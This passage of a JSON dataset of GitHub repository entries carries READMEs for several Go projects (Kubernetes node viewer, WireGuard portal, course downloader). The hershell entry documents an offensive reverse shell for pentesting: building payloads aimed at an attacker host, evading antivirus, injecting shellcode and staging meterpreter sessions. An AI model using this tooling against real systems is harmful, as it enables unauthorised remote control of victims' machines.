\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "awslabs/eks-node-viewer", "link": "https://github.com/awslabs/eks-node-viewer", "tags": [], "stars": 509, "description": "EKS Node Viewer", "lang": "Go", "repo_lang": "", "readme": "[![GitHub License](https://img.shields.io/badge/License-Apache%202.0-ff69b4.svg)](https://github.com/awslabs/eks-node-viewer/blob/main/LICENSE)\n[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/awslabs/eks-node-viewer/issues)\n\n## Usage\n\n`eks-node-viewer` is a tool for visualizing dynamic node usage within a cluster. It was originally developed as an internal tool at AWS for demonstrating consolidation with [Karpenter](https://karpenter.sh/). It displays the scheduled pod resource requests vs the allocatable capacity on the node. It *does not* look at the actual pod resource usage.\n\n![](./.static/screenshot.png)\n\n### Talks Using eks-node-viewer\n\n- [Containers from the Couch: Workload Consolidation with Karpenter](https://www.youtube.com/watch?v=BnksdJ3oOEs)\n- [AWS re:Invent 2022 - Kubernetes virtually anywhere, for everyone](https://www.youtube.com/watch?v=OB7IZolZk78)\n\n### Installation\n\n```shell\ngo install github.com/awslabs/eks-node-viewer/cmd/eks-node-viewer@latest\n```\n\nNote: This will install it to your `GOBIN` directory, typically `~/go/bin` if it is unconfigured.\n\n## Usage\n```shell\nUsage of ./eks-node-viewer:\n -context string\n \tName of the kubernetes context to use\n -disable-pricing\n \tDisable pricing lookups\n -extra-labels string\n \tA comma separated set of extra node labels to display\n -kubeconfig string\n \tAbsolute path to the kubeconfig file (default \"~/.kube/config\")\n -node-selector string\n \tNode label selector used to filter nodes, if empty all nodes are selected\n -resources string\n \tList of comma separated resources to monitor (default \"cpu\")\n```\n\n### Examples\n```shell\n# Standard usage\neks-node-viewer\n# Karenter nodes only\neks-node-viewer --node-selector \"karpenter.sh/provisioner-name\"\n# Display both CPU and Memory Usage\neks-node-viewer --resources cpu,memory\n# Display extra labels, i.e. AZ\neks-node-viewer --extra-labels topology.kubernetes.io/zone\n# Specify a particular AWS profile and region\nAWS_PROFILE=myprofile AWS_REGION=us-west-2\n```\n\n\n### Default Options\nYou can supply default options to `eks-node-viewer` by creating a file named `.eks-node-viewer` in your home directory and specifying\noptions there. The format is `option-name=value` where the option names are the command line flags:\n```text\n# select only Karpenter managed nodes\nnode-selector=karpenter.sh/provisioner-name\n\n# display both CPU and memory\nresources=cpu,memory\n```\n\n\n### Troubleshooting\n\n#### NoCredentialProviders: no valid providers in chain. Deprecated.\n\nThis CLI relies on AWS credentials to access pricing data if you don't use the `--disable-pricing` option. 
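\nIf pricing data is not needed, the lookup (and with it the credential requirement) can be skipped entirely with the flag listed in the usage section above; otherwise credentials are required as described below.\n\n```shell\neks-node-viewer --disable-pricing\n```\n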
You must have credentials configured via `~/aws/credentials`, `~/.aws/config`, environment variables, or some other credential provider chain.\n\nSee [credential provider documentation](https://docs.aws.amazon.com/sdk-for-go/api/aws/session/) for more.\n\n#### I get an error of `creating client, exec plugin: invalid apiVersion \"client.authentication.k8s.io/v1alpha1\"`\n\nUpdating your AWS cli to the latest version and [updating your kubeconfig](https://docs.aws.amazon.com/cli/latest/reference/eks/update-kubeconfig.html) should resolve this issue.\n\n## Development\n\n### Building\n```shell\n$ make build\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sysdream/hershell", "link": "https://github.com/sysdream/hershell", "tags": ["pentest", "reverse-shell", "infosec", "redteam"], "stars": 509, "description": "Hershell is a simple TCP reverse shell written in Go.", "lang": "Go", "repo_lang": "", "readme": "# Hershell\n\n**NOTE:** the project has been forked on [this repo](https://github.com/lesnuages/hershell), check there for any other developments.\n\nHershell is a simple TCP reverse shell written in [Go](https://golang.org).\n\nIt uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception.\n\nSupported OS are:\n\n- Windows\n- Linux\n- Mac OS\n- FreeBSD and derivatives\n\n## Why ?\n\nAlthough meterpreter payloads are great, they are sometimes spotted by AV products.\n\nThe goal of this project is to get a simple reverse shell, which can work on multiple systems.\n\n## How ?\n\nSince it's written in Go, you can cross compile the source for the desired architecture.\n\n## Getting started & dependencies\n\nAs this is a Go project, you will need to follow the [official documentation](https://golang.org/doc/install) to set up\nyour Golang environment (with the `$GOPATH` environment variable).\n\nThen, just run `go get github.com/sysdream/hershell` to fetch the project.\n\n### Building the payload\n\nTo simplify things, you can use the provided Makefile.\nYou can set the following environment variables:\n\n- ``GOOS`` : the target OS\n- ``GOARCH`` : the target architecture\n- ``LHOST`` : the attacker IP or domain name\n- ``LPORT`` : the listener port\n\nFor the ``GOOS`` and ``GOARCH`` variables, you can get the allowed values [here](https://golang.org/doc/install/source#environment).\n\nHowever, some helper targets are available in the ``Makefile``:\n\n- ``depends`` : generate the server certificate (required for the reverse shell)\n- ``windows32`` : builds a windows 32 bits executable (PE 32 bits)\n- ``windows64`` : builds a windows 64 bits executable (PE 64 bits)\n- ``linux32`` : builds a linux 32 bits executable (ELF 32 bits)\n- ``linux64`` : builds a linux 64 bits executable (ELF 64 bits)\n- ``macos32`` : builds a mac os 32 bits executable (Mach-O)\n- ``macos64`` : builds a mac os 64 bits executable (Mach-O)\n\nFor those targets, you just need to set the ``LHOST`` and ``LPORT`` environment variables.\n\n### Using the shell\n\nOnce executed, you will be provided with a remote shell.\nThis custom interactive shell will allow you to execute system commands through `cmd.exe` on Windows, or `/bin/sh` on UNIX machines.\n\nThe following special commands are supported:\n\n* ``run_shell`` : drops you an system shell (allowing you, for example, to change directories)\n* ``inject `` : injects a shellcode (base64 encoded) in the same 
process memory, and executes it (Windows only at the moment).\n* ``meterpreter [tcp|http|https] IP:PORT`` : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)\n* ``exit`` : exit gracefully\n\n## Usage\n\nFirst of all, you will need to generate a valid certificate:\n```bash\n$ make depends\nopenssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem\nGenerating a 4096 bit RSA private key\n....................................................................................++\n.....++\nwriting new private key to 'server.key'\n-----\ncat server.key >> server.pem\n```\n\nFor windows:\n\n```bash\n# Predifined 32 bit target\n$ make windows32 LHOST=192.168.0.12 LPORT=1234\n# Predifined 64 bit target\n$ make windows64 LHOST=192.168.0.12 LPORT=1234\n```\n\nFor Linux:\n```bash\n# Predifined 32 bit target\n$ make linux32 LHOST=192.168.0.12 LPORT=1234\n# Predifined 64 bit target\n$ make linux64 LHOST=192.168.0.12 LPORT=1234\n```\n\nFor Mac OS X\n```bash\n$ make macos LHOST=192.168.0.12 LPORT=1234\n```\n\n## Examples\n\n### Basic usage\n\nOne can use various tools to handle incomming connections, such as:\n\n* socat\n* ncat\n* openssl server module\n* metasploit multi handler (with a `python/shell_reverse_tcp_ssl` payload)\n\nHere is an example with `ncat`:\n\n```bash\n$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234\nNcat: Version 7.60 ( https://nmap.org/ncat )\nNcat: Listening on :::1234\nNcat: Listening on 0.0.0.0:1234\nNcat: Connection from 172.16.122.105.\nNcat: Connection from 172.16.122.105:47814.\n[hershell]> whoami\ndesktop-3pvv31a\\lab\n```\n\n### Meterpreter staging\n\n**WARNING**: this currently only work for the Windows platform.\n\nThe meterpreter staging currently supports the following payloads :\n\n* `windows/meterpreter/reverse_tcp`\n* `windows/x64/meterpreter/reverse_tcp`\n* `windows/meterpreter/reverse_http`\n* `windows/x64/meterpreter/reverse_http`\n* `windows/meterpreter/reverse_https`\n* `windows/x64/meterpreter/reverse_https`\n\nTo use the correct one, just specify the transport you want to use (tcp, http, https)\n\nTo use the meterpreter staging feature, just start your handler:\n\n```bash\n[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler\n[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https\npayload => windows/x64/meterpreter/reverse_https\n[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105\nlhost => 172.16.122.105\n[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443\nlport => 8443\n[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem\nHandlerSSLCert => ./server.pem\n[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j\n[*] Exploit running as background job 0.\n\n[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443\n[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >\n```\n\nThen, in `hershell`, use the `meterpreter` command:\n\n```bash\n[hershell]> meterpreter https 172.16.122.105:8443\n```\n\nA new meterpreter session should pop in `msfconsole`:\n\n```bash\n[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >\n[*] [2018.01.29-14:16:44] 
https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...\n[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100\n\n[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions\n\nActive sessions\n===============\n\n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 meterpreter x64/windows DESKTOP-3PVV31A\\lab @ DESKTOP-3PVV31A 172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)\n\n[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1\n[*] Starting interaction with 1...\n\nmeterpreter > getuid\nServer username: DESKTOP-3PVV31A\\lab\n```\n\n## Credits\n\nRonan Kervella ``\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tokopedia/gripmock", "link": "https://github.com/tokopedia/gripmock", "tags": ["grpc", "mock", "mockserver"], "stars": 509, "description": "gRPC Mock Server", "lang": "Go", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mmzou/geektime-dl", "link": "https://github.com/mmzou/geektime-dl", "tags": [], "stars": 509, "description": "\ud83d\udc7e Geektime-dl \u662f\u4f7f\u7528Go\u6784\u5efa\u7684\u5feb\u901f\u3001\u7b80\u5355\u7684\u6781\u5ba2\u65f6\u95f4\u4e0b\u8f7d\u5668\uff0c\u652f\u6301\u4e13\u680f\u4e0b\u8f7d\u4e3aPDF\u6587\u6863\u3002", "lang": "Go", "repo_lang": "", "readme": "##geektime-dl\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/mmzou/geektime-dl)](https://goreportcard.com/report/github.com/mmzou/geektime-dl)\n[![GitHub release](https://img.shields.io/github/v/release/mmzou/geektime-dl.svg)](https://github.com/mmzou/geektime-dl/releases)\n\n\ud83d\udc7e Geektime-dl is a fast and simple [Geektime](https://time.geekbang.org/) downloader built in Go, and supports downloading columns as PDF documents.\n\n### `Video download has expired`: The video of Geek Time uses the private encryption method of Alibaba Cloud video, and there is no way to crack it for the time being!\n\n- [installation](#installation)\n - [required condition](#required condition)\n - [Install using `go get`](#%e4%bd%bf%e7%94%a8go-get%e5%ae%89%e8%a3%85)\n- [Getting Started](#%e5%85%a5%e9%97%a8)\n - [Download of videos and columns](#Download of videos and columns)\n - [View video or column list](#View video or column list)\n - [Can resume and continue downloading](#Can resume and continue downloading)\n - [login](#login)\n- [reference warehouse](#reference warehouse)\n- [License](#license)\n\n## Install\n\n### Prerequisites\n\nThe following dependencies must be installed:\n\n* **[FFmpeg](https://www.ffmpeg.org)**\n\n> **Note**: The use of FFmpeg is to merge the final video files into the required format.\n\n* **[Google-Chrome](https://www.google.cn/intl/zh-CN/chrome/)**\n\n> **Note**: Use the [`chromedp/chromedp`](https://github.com/chromedp/chromedp) tool to export pages as PDF documents, which requires the support of Google Chrome.\n\n### Install using `go get`\n\nTo install Geektime-dl, you can use the following `go get` command, or download the binary file from the [Releases](https://github.com/mmzou/geektime-dl/releases) page.\n\n```bash\n$ go get github.com/mmzou/geektime-dl\n```\n\n## getting Started\n\nInstructions:\n\n```bash\n#download\ngeektime-dl [OPTIONS] course_id 
[directory_id]\n#View columns, videos, login and other command operations\ngeektime-dl [OPTIONS] command\n```\n\ninclude command\n\n```text\n login login geek time\n who gets the current account number\n users get account list\n su switch Geek Time account\n buy Get purchased columns and video courses\n column Get column list\n video Get a list of video lessons\n help, h help\n```\n\n\n### Download of videos and columns\n\nOnly purchased or free videos and columns can be downloaded.\n\n```console\n$ geektime -dl 66\n01 - What is Microservice Architecture? 107.55 MiB / 107.54 MiB [=======================================] 100.01% 1.42 MiB/s 1m15s\n02 - How do architects weigh the pros and cons of microservices? 92.10 MiB / 92.09 MiB [===============================] 100.01% 1.69 MiB/s 54s\n03 - What enlightenment does Conway's law and microservices give architects? 69.38 MiB / 69.38 MiB [=======================] 100.01% 1.68 MiB/s 41s\n04 - When should enterprises start to consider introducing microservices? 114.20 MiB / 114.20 MiB [====================] 100.00% 1.41 MiB/s 1m21s\n05 - What kind of organizational structure is more suitable for microservices? 121.10 MiB / 121.09 MiB [===========================] 100.00% 1.66 MiB/s 1m13s\n06 - How to understand Alibaba's microservice mid-stage strategy? 65.23 MiB / 126.82 MiB [===========>---------] 51.43% 1.68 MiB/s 1m15s\n```\n\nJust download one of the catalogs in the course\n\n```console\n$ geektime -dl 66 2276\n16 - Microservice Monitoring System Layering and Monitoring Architecture 11.22 MiB / 97.55 MiB [======>--------------------] 28.51% 1.30 MiB/ s 01m06s\n```\n\nWhen downloading a column, you can also download the content of the column as a PDF document (`Google browser support is required`)\n\n```console\n04 - Static Containers: How Office Supplies Expresses Your Content? 13.94 MiB / 13.94 MiB [=====================] 100.00% 2.23 MiB/s 6s\nGenerating files: [04 - Static Containers: How do office supplies express your content? .pdf] Done\n```\n\n> **Note**: `If the generated file fails, you can repeat the command to generate again for the failed file`, the generated file will not be generated repeatedly. If you fail many times, you can ask questions in Issues.\n\nView the downloadable catalog within the course\n\n```console\n$ geektime-dl -i 66\n+----+------+------+------------------------------ ----------------+---------+---------+---------+--- ---+\n| # | ID | Type | Name | SD | LD | HD | Download |\n+----+------+------+------------------------------ ----------------+---------+---------+---------+--- ---+\n| 0 | 2184 | Video | 01 What is Microservice Architecture? | 86.52M | 53.45M | 107.54M | \u2714 |\n| 1 | 2185 | Video | 02 How do architects weigh the pros and cons of microservices? | 71.43M | 44.12M | 92.09M | \u2714 |\n| 2 | 2154 | Video | 03 What enlightenment does Conway's law and microservices give architects? | 54.32M | 33.57M | 69.38M | \u2714 |\n| 3 | 2186 | Video | 04 When Should Enterprises Consider Microservices? | 90.07M | 55.67M | 114.20M | \u2714 |\n| 4 | 2187 | Video | 05 What kind of organizational structure is more suitable for microservices? | 90.22M | 55.79M | 121.09M | \u2714 |\n| 5 | 2188 | Video | 06 How to understand Alibaba's microservice middle-end strategy? | 126.82M | 100.05M | 61.79M | \u2714 |\n| 6 | 2189 | Video | 07 How to give a clear and concise service layering method? 
| 45.89M | 62.07M | 61.95M | \u2714 |\n| 7 | 2222 | Video | 08 How is the overall technical architecture of microservices designed? | 85.67M | 52.91M | 109.83M | \u2714 |\n| 8 | 2269 | Video | 09 Three classic service discovery mechanisms for microservices | 94.00M | 73.18M | 45.21M | \u2714 |\n```\n\n### View a list of videos or columns\n\n```bash\n#View column list\n$ geektime -dl column\n+----+-----+---------------------------+---------- --+------------------+------+\n| # | ID | Name | Time | Author | Purchase |\n+----+-----+---------------------------+---------- --+------------------+------+\n| 0 | 42 | Technology and Business Case Interpretation | 2017-09-07 | Xu Fei | |\n| 1 | 43 | AI Technology Internal Reference | 2017-09-11 | Hong Liangjie | |\n| 2 | 48 | The left ear listens to the wind| 2017-09-20 | Chen Hao | Yes |\n| 3 | 49 | Zhu Yun's technical management class | 2017-11-09 | Zhu Yun | Yes |\n| 4 | 50 | Qiu Yue's product notes | 2017-11-16 | Qiu Yue | |\n| 5 | 62 | Artificial Intelligence Basic Course | 2017-12-01 | Wang Tianyi | Yes |\n| 6 | 63 | Zhao Cheng's operation and maintenance system management course | 2017-12-13 | Zhao Cheng | |\n| 7 | 74 | Thirty-six types of recommendation system | 2018-02-23 |\n| 8 | 76 | Simple explanation of blockchain | 2018-03-19 | Chen Hao | Yes |\n\n\n#View video list\n$ geektime -dl video\n+----+-----+-------------------------------------- ----+------------+-------------+------+\n| # | ID | Name | Time | Author | Purchase |\n+----+-----+-------------------------------------- ----+------------+-------------+------+\n| 0 | 66 | 20 Lectures on the Core of Microservice Architecture | 2018-01-08 | Yang Bo | Yes |\n| 1 | 77 | 9 hours to complete the development of WeChat applets | 2018-03-22 | Gao Lei | |\n| 2 | 84 | 160 Lectures on Microservice Architecture | 2018-05-03 | Yang Bo | Yes |\n| 3 | 98 | Learning Python from Zero | 2018-05-25 | Yin Huisheng | |\n```\n\n### Can resume and continue downloading\n\nCtrl+C Interrupts the download.\n\nThere is `.download` temporary file, execute `geektime-dl` command with the same parameters, then the download progress will resume from the previous session.\n\n### Log in\n\nLogin with account and password:\n\n```console\n$ geektime-dl login --phone xxxxxx --password xxxxxx\nGeek time account login successful: XXX\n```\n\nLogin via cookie:\n\n```console\n$ geektime-dl login --gcid xxxxxx --gcess xxxxxx --serverId 'xxxxxxx'\nGeek time account login successful: XXX\n```\n\n## Reference repository\n\n* [annie](https://github.com/iawia002/annie)\n\n\n## License\n\nMIT\n\nCopyright (c) 2020-present, mmzou", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "h44z/wg-portal", "link": "https://github.com/h44z/wg-portal", "tags": ["wireguard", "vpn", "ui", "webinterface", "usermanagement", "ldap"], "stars": 508, "description": "WireGuard Configuration Portal with LDAP connection", "lang": "Go", "repo_lang": "", "readme": "# WireGuard Portal\n\n[![Build Status](https://travis-ci.com/h44z/wg-portal.svg?token=q4pSqaqT58Jzpxdx62xk&branch=master)](https://travis-ci.com/h44z/wg-portal)\n[![License: MIT](https://img.shields.io/badge/license-MIT-green.svg)](https://opensource.org/licenses/MIT)\n![GitHub last commit](https://img.shields.io/github/last-commit/h44z/wg-portal)\n[![Go Report Card](https://goreportcard.com/badge/github.com/h44z/wg-portal)](https://goreportcard.com/report/github.com/h44z/wg-portal)\n![GitHub go.mod Go 
version](https://img.shields.io/github/go-mod/go-version/h44z/wg-portal)\n![GitHub code size in bytes](https://img.shields.io/github/languages/code-size/h44z/wg-portal)\n[![Docker Pulls](https://img.shields.io/docker/pulls/h44z/wg-portal.svg)](https://hub.docker.com/r/h44z/wg-portal/)\n\nA simple, web based configuration portal for [WireGuard](https://wireguard.com).\nThe portal uses the WireGuard [wgctrl](https://github.com/WireGuard/wgctrl-go) library to manage existing VPN\ninterfaces. This allows for seamless activation or deactivation of new users, without disturbing existing VPN\nconnections.\n\nThe configuration portal currently supports using SQLite and MySQL as a user source for authentication and profile data.\nIt also supports LDAP (Active Directory or OpenLDAP) as authentication provider.\n\n## Features\n * Self-hosted and web based\n * Automatically select IP from the network pool assigned to client\n * QR-Code for convenient mobile client configuration\n * Sent email to client with QR-code and client config\n * Enable / Disable clients seamlessly\n * Generation of `wgX.conf` after any modification\n * IPv6 ready\n * User authentication (SQLite/MySQL and LDAP)\n * Dockerized\n * Responsive template\n * One single binary\n * Can be used with existing WireGuard setups\n * Support for multiple WireGuard interfaces\n * REST API for management and client deployment\n * Peer Expiry Feature\n\n![Screenshot](screenshot.png)\n\n## Setup\nMake sure that your host system has at least one WireGuard interface (for example wg0) available.\nIf you did not start up a WireGuard interface yet, take a look at [wg-quick](https://manpages.debian.org/unstable/wireguard-tools/wg-quick.8.en.html) in order to get started.\n\n### Docker\nThe easiest way to run WireGuard Portal is to use the Docker image provided.\n\nHINT: the *latest* tag always refers to the master branch and might contain unstable or incompatible code!\n\nDocker Compose snippet with some sample configuration values:\n```\nversion: '3.6'\nservices:\n wg-portal:\n image: h44z/wg-portal:latest\n container_name: wg-portal\n restart: unless-stopped\n cap_add:\n - NET_ADMIN\n network_mode: \"host\"\n volumes:\n - /etc/wireguard:/etc/wireguard\n - ./data:/app/data\n ports:\n - '8123:8123'\n environment:\n # WireGuard Settings\n - WG_DEVICES=wg0\n - WG_DEFAULT_DEVICE=wg0\n - WG_CONFIG_PATH=/etc/wireguard\n # Core Settings\n - EXTERNAL_URL=https://vpn.company.com\n - WEBSITE_TITLE=WireGuard VPN\n - COMPANY_NAME=Your Company Name\n - ADMIN_USER=admin@domain.com\n - ADMIN_PASS=supersecret\n # Mail Settings\n - MAIL_FROM=WireGuard VPN \n - EMAIL_HOST=10.10.10.10\n - EMAIL_PORT=25\n # LDAP Settings\n - LDAP_ENABLED=true\n - LDAP_URL=ldap://srv-ad01.company.local:389\n - LDAP_BASEDN=DC=COMPANY,DC=LOCAL\n - LDAP_USER=ldap_wireguard@company.local\n - LDAP_PASSWORD=supersecretldappassword\n - LDAP_ADMIN_GROUP=CN=WireGuardAdmins,OU=Users,DC=COMPANY,DC=LOCAL\n```\nPlease note that mapping ```/etc/wireguard``` to ```/etc/wireguard``` inside the docker, will erase your host's current configuration.\nIf needed, please make sure to back up your files from ```/etc/wireguard```.\nFor a full list of configuration options take a look at the source file [internal/server/configuration.go](internal/server/configuration.go#L58).\n\n### Standalone\nFor a standalone application, use the Makefile provided in the repository to build the application. 
Go version 1.16 or higher has to be installed to build WireGuard Portal.\n\n```shell\n# show all possible make commands\nmake\n\n# build wg-portal for current system architecture\nmake build\n```\n\nThe compiled binary will be located in the dist folder.\nA detailed description for using this software with a raspberry pi can be found in the [README-RASPBERRYPI.md](README-RASPBERRYPI.md).\n\nTo build the Docker image, Docker (> 20.x) with buildx is required. If you want to build cross-platform images, you need to install qemu.\nOn arch linux for example install: `docker-buildx qemu-user-static qemu-user-static-binfmt`.\n\nOnce the Docker setup is completed, create a new buildx builder: \n```shell\ndocker buildx create --name wgportalbuilder --platform linux/arm/v7,linux/arm64,linux/amd64\ndocker buildx use wgportalbuilder\ndocker buildx inspect --bootstrap\n```\nNow you can compile the Docker image:\n```shell\n# multi platform build, can only be exported to tar archives\ndocker buildx build --platform linux/arm/v7,linux/arm64,linux/amd64 --output type=local,dest=docker_images \\\n --build-arg BUILD_IDENTIFIER=dev --build-arg BUILD_VERSION=0.1 -t h44z/wg-portal .\n \n\n# image for current platform only (same as docker build)\ndocker buildx build --load \\\n --build-arg BUILD_IDENTIFIER=dev --build-arg BUILD_VERSION=0.1 -t h44z/wg-portal .\n```\n\n## Configuration\nYou can configure WireGuard Portal using either environment variables or a yaml configuration file.\nThe filepath of the yaml configuration file defaults to **config.yml** in the working directory of the executable.\nIt is possible to override the configuration filepath using the environment variable **CONFIG_FILE**.\nFor example: `CONFIG_FILE=/home/test/config.yml ./wg-portal-amd64`.\n\n### Configuration Options\nThe following configuration options are available:\n\n| environment | yaml | yaml_parent | default_value | description |\n|----------------------------|-------------------------|-------------|-----------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------|\n| LISTENING_ADDRESS | listeningAddress | core | :8123 | The address on which the web server is listening. Optional IP address and port, e.g.: 127.0.0.1:8080. |\n| EXTERNAL_URL | externalUrl | core | http://localhost:8123 | The external URL where the web server is reachable. This link is used in emails that are created by the WireGuard Portal. |\n| WEBSITE_TITLE | title | core | WireGuard VPN | The website title. |\n| COMPANY_NAME | company | core | WireGuard Portal | The company name (for branding). |\n| MAIL_FROM | mailFrom | core | WireGuard VPN | The email address from which emails are sent. |\n| LOGO_URL | logoUrl | core | /img/header-logo.png | The logo displayed in the page's header. |\n| ADMIN_USER | adminUser | core | admin@wgportal.local | The administrator user. Must be a valid email address. |\n| ADMIN_PASS | adminPass | core | wgportal | The administrator password. If unchanged, a random password will be set on first startup. |\n| EDITABLE_KEYS | editableKeys | core | true | Allow to edit key-pairs in the UI. |\n| CREATE_DEFAULT_PEER | createDefaultPeer | core | false | If an LDAP user logs in for the first time, a new WireGuard peer will be created on the WG_DEFAULT_DEVICE if this option is enabled. 
|\n| SELF_PROVISIONING | selfProvisioning | core | false | Allow registered users to automatically create peers via the RESTful API. |\n| WG_EXPORTER_FRIENDLY_NAMES | wgExporterFriendlyNames | core | false | Enable integration with [prometheus_wireguard_exporter friendly name](https://github.com/MindFlavor/prometheus_wireguard_exporter#friendly-tags). |\n| LDAP_ENABLED | ldapEnabled | core | false | Enable or disable the LDAP backend. |\n| SESSION_SECRET | sessionSecret | core | secret | Use a custom secret to encrypt session data. |\n| BACKGROUND_TASK_INTERVAL | backgroundTaskInterval | core | 900 | The interval (in seconds) for the background tasks (like peer expiry check). |\n| EXPIRY_REENABLE | expiryReEnable | core | false | Reactivate expired peers if the expiration date is in the future. |\n| DATABASE_TYPE | typ | database | sqlite | Either mysql or sqlite. |\n| DATABASE_HOST | host | database | | The mysql server address. |\n| DATABASE_PORT | port | database | | The mysql server port. |\n| DATABASE_NAME | database | database | data/wg_portal.db | For sqlite database: the database file-path, otherwise the database name. |\n| DATABASE_USERNAME | user | database | | The mysql user. |\n| DATABASE_PASSWORD | password | database | | The mysql password. |\n| EMAIL_HOST | host | email | 127.0.0.1 | The email server address. |\n| EMAIL_PORT | port | email | 25 | The email server port. |\n| EMAIL_TLS | tls | email | false | Use STARTTLS. DEPRECATED: use EMAIL_ENCRYPTION instead. |\n| EMAIL_ENCRYPTION | encryption | email | none | Either none, tls or starttls. |\n| EMAIL_CERT_VALIDATION | certcheck | email | false | Validate the email server certificate. |\n| EMAIL_USERNAME | user | email | | An optional username for SMTP authentication. |\n| EMAIL_PASSWORD | pass | email | | An optional password for SMTP authentication. |\n| EMAIL_AUTHTYPE | auth | email | plain | Either plain, login or crammd5. If username and password are empty, this value is ignored. |\n| WG_DEVICES | devices | wg | wg0 | A comma separated list of WireGuard devices. |\n| WG_DEFAULT_DEVICE | defaultDevice | wg | wg0 | This device is used for auto-created peers (if CREATE_DEFAULT_PEER is enabled). |\n| WG_CONFIG_PATH | configDirectory | wg | /etc/wireguard | If set, interface configuration updates will be written to this path, filename: .conf. |\n| MANAGE_IPS | manageIPAddresses | wg | true | Handle IP address setup of interface, only available on linux. |\n| USER_MANAGE_PEERS | userManagePeers | wg | false | Logged in user can create or update peers (partially). |\n| LDAP_URL | url | ldap | ldap://srv-ad01.company.local:389 | The LDAP server url. |\n| LDAP_STARTTLS | startTLS | ldap | true | Use STARTTLS. |\n| LDAP_CERT_VALIDATION | certcheck | ldap | false | Validate the LDAP server certificate. |\n| LDAP_BASEDN | dn | ldap | DC=COMPANY,DC=LOCAL | The base DN for searching users. |\n| LDAP_USER | user | ldap | company\\\\\\\\ldap_wireguard | The bind user. |\n| LDAP_PASSWORD | pass | ldap | SuperSecret | The bind password. |\n| LDAP_LOGIN_FILTER | loginFilter | ldap | (&(objectClass=organizationalPerson)(mail={{login_identifier}})(!userAccountControl:1.2.840.113556.1.4.803:=2)) | {{login_identifier}} will be replaced with the login email address. |\n| LDAP_SYNC_FILTER | syncFilter | ldap | (&(objectClass=organizationalPerson)(!userAccountControl:1.2.840.113556.1.4.803:=2)(mail=*)) | The filter string for the LDAP synchronization service. Users matching this filter will be synchronized with the WireGuard Portal database. 
|\n| LDAP_SYNC_GROUP_FILTER | syncGroupFilter | ldap | | The filter string for the LDAP groups, for example: (objectClass=group). The groups are used to recursively check for admin group member ship of users. |\n| LDAP_ADMIN_GROUP | adminGroup | ldap | CN=WireGuardAdmins,OU=_O_IT,DC=COMPANY,DC=LOCAL | Users in this group are marked as administrators. |\n| LDAP_ATTR_EMAIL | attrEmail | ldap | mail | User email attribute. |\n| LDAP_ATTR_FIRSTNAME | attrFirstname | ldap | givenName | User firstname attribute. |\n| LDAP_ATTR_LASTNAME | attrLastname | ldap | sn | User lastname attribute. |\n| LDAP_ATTR_PHONE | attrPhone | ldap | telephoneNumber | User phone number attribute. |\n| LDAP_ATTR_GROUPS | attrGroups | ldap | memberOf | User groups attribute. |\n| LDAP_CERT_CONN | ldapCertConn | ldap | false | Allow connection with certificate against LDAP server without user/password |\n| LDAPTLS_CERT | ldapTlsCert | ldap | | The LDAP cert's path |\n| LDAPTLS_KEY | ldapTlsKey | ldap | | The LDAP key's path |\n| LOG_LEVEL | | | debug | Specify log level, one of: trace, debug, info, off. |\n| LOG_JSON | | | false | Format log output as JSON. |\n| LOG_COLOR | | | true | Colorize log output. |\n| CONFIG_FILE | | | config.yml | The config file path. |\n\n### Sample yaml configuration\nconfig.yml:\n```yaml\ncore:\n listeningAddress: :8123\n externalUrl: https://wg-test.test.com\n adminUser: test@test.com\n adminPass: test\n editableKeys: true\n createDefaultPeer: false\n ldapEnabled: true\n mailFrom: WireGuard VPN \nldap:\n url: ldap://10.10.10.10:389\n dn: DC=test,DC=test\n startTLS: false\n user: wireguard@test.test\n pass: test\n adminGroup: CN=WireGuardAdmins,CN=Users,DC=test,DC=test\ndatabase:\n typ: sqlite\n database: data/wg_portal.db\nemail:\n host: smtp.gmail.com\n port: 587\n tls: true\n user: test@gmail.com\n pass: topsecret\nwg:\n devices:\n - wg0\n - wg1\n defaultDevice: wg0\n configDirectory: /etc/wireguard\n manageIPAddresses: true\n```\n\n### RESTful API\nWireGuard Portal offers a RESTful API to interact with.\nThe API is documented using OpenAPI 2.0, the Swagger UI can be found\nunder the URL 